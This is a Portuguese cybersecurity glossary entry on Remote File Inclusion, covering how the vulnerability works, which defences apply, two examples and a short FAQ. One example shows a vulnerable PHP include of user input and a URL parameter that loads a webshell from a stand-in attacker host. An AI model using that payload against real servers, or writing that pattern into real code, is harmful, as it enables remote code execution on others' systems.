Inclusão Remota de Ficheiros (RFI)
O que é Inclusão Remota de Ficheiros (RFI)?
Inclusão Remota de Ficheiros (RFI)Vulnerabilidade que permite ao atacante forçar o servidor a obter e executar código a partir de um URL remoto à sua escolha.
A inclusão remota de ficheiros (RFI) ocorre quando uma aplicação passa uma entrada controlada pelo utilizador a uma função include ou require e o runtime suporta URLs remotos (por exemplo PHP com allow_url_include ativado). O servidor descarrega o ficheiro a partir de um host controlado pelo atacante e executa-o no processo da aplicação, resultando em execução remota de código imediata. A RFI é, em geral, mais grave do que a LFI porque não requer acesso de escrita prévio ao servidor. As defesas são desativar a inclusão de URLs remotos no runtime, usar listas brancas rigorosas de nomes de módulos estáticos, nunca incluir caminhos derivados de entrada do utilizador e segmentar os servidores aplicacionais com filtragem de saída restrita.
● Exemplos
- 01
Uma aplicação PHP a chamar include($_GET['page']), onde ?page=https://atacante.example/shell.txt carrega e executa uma webshell.
- 02
Um plugin de CMS desatualizado que carrega uma página de administração a partir de um parâmetro URL permite executar um ficheiro PHP alojado pelo atacante.
● Perguntas frequentes
O que é Inclusão Remota de Ficheiros (RFI)?
Vulnerabilidade que permite ao atacante forçar o servidor a obter e executar código a partir de um URL remoto à sua escolha. Pertence à categoria Ataques e ameaças da cibersegurança.
O que significa Inclusão Remota de Ficheiros (RFI)?
Vulnerabilidade que permite ao atacante forçar o servidor a obter e executar código a partir de um URL remoto à sua escolha.
Como se defender contra Inclusão Remota de Ficheiros (RFI)?
As defesas contra Inclusão Remota de Ficheiros (RFI) costumam combinar controles técnicos e práticas operacionais, conforme detalhado na definição acima.
Quais são outros nomes para Inclusão Remota de Ficheiros (RFI)?
Nomes alternativos comuns: RFI.